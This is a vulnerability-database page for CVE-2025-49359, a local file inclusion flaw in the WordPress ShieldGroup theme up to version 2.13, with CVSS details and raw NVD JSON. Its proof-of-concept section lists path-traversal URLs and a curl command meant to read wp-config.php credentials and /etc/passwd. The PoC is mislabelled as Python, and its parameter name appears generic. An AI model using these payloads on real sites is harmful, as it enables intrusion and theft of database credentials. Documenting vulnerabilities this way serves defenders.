Security Vulnerability Report
中文
CVE-2025-49359 CVSS 8.1 HIGH

CVE-2025-49359

Published: 2025-12-18 08:15:50
Last Modified: 2026-04-27 20:16:11

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes ShieldGroup shieldgroup allows PHP Local File Inclusion.This issue affects ShieldGroup: from n/a through <= 2.13.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ShieldGroup Theme <= 2.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-49359 - ShieldGroup Theme Local File Inclusion PoC * Target: WordPress ShieldGroup Theme <= 2.13 * Type: Local File Inclusion * Author: Security Researcher * Note: For authorized testing only */ // Basic LFI PoC - Read system files $poc_urls = [ // Read wp-config.php (database credentials) "http://target.com/wp-content/themes/shieldgroup/?theme=../../wp-config.php%00", // Read /etc/passwd "http://target.com/wp-content/themes/shieldgroup/?theme=../../../../../../etc/passwd%00", // Read PHP source files "http://target.com/wp-content/themes/shieldgroup/?theme=../../wp-content/themes/shieldgroup/functions.php%00", // Windows target "http://target.com/wp-content/themes/shieldgroup/?theme=..\..\..\..\windows\system32\drivers\etc\hosts" ]; // Example curl command for testing: // curl -i 'http://target.com/wp-content/themes/shieldgroup/?theme=../../wp-config.php%00' // // If vulnerable, the content of wp-config.php will be displayed, // potentially exposing database credentials, API keys, etc. echo "CVE-2025-49359 LFI PoC\n"; echo "Target: WordPress ShieldGroup Theme <= 2.13\n"; echo "Vulnerability: Local File Inclusion\n"; echo "\nTest URLs:\n"; foreach ($poc_urls as $url) { echo "- $url\n"; } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49359", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:49.980", "lastModified": "2026-04-27T20:16:11.367", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes ShieldGroup shieldgroup allows PHP Local File Inclusion.This issue affects ShieldGroup: from n/a through <= 2.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/shieldgroup/vulnerability/wordpress-shieldgroup-theme-2-13-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}